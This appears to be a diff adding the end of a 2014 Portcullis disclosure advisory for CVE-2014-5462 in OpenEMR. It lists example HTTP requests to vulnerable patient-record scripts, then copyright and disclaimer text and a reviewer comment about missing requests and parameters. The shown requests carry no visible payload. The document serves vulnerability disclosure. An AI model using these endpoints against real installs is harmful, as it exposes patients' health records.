+ ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female
+
+
+Request 17
+
+GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1 HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
+Connection: keep-alive
+
+
+Request 18
+
+GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1 HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225
+
+
+Further details at:
+
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
\ No newline at end of file
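Review bot: The request listing is incomplete: the numbering skips Request 4 and Request 13, and the body of Request 3 ends in ` HTTP/1.1` followed by a second `Host:` header, so the start of another request has been fused into it. None of the requests marks which parameter is injectable, which leaves the maintainer of an affected install unable to tell which inputs to audit in each script. With `Fixed version: N/A`, I would restore the missing requests from the linked Portcullis advisory and add one line per request naming the affected parameter. A general note that the listed scripts need bound query parameters would also help.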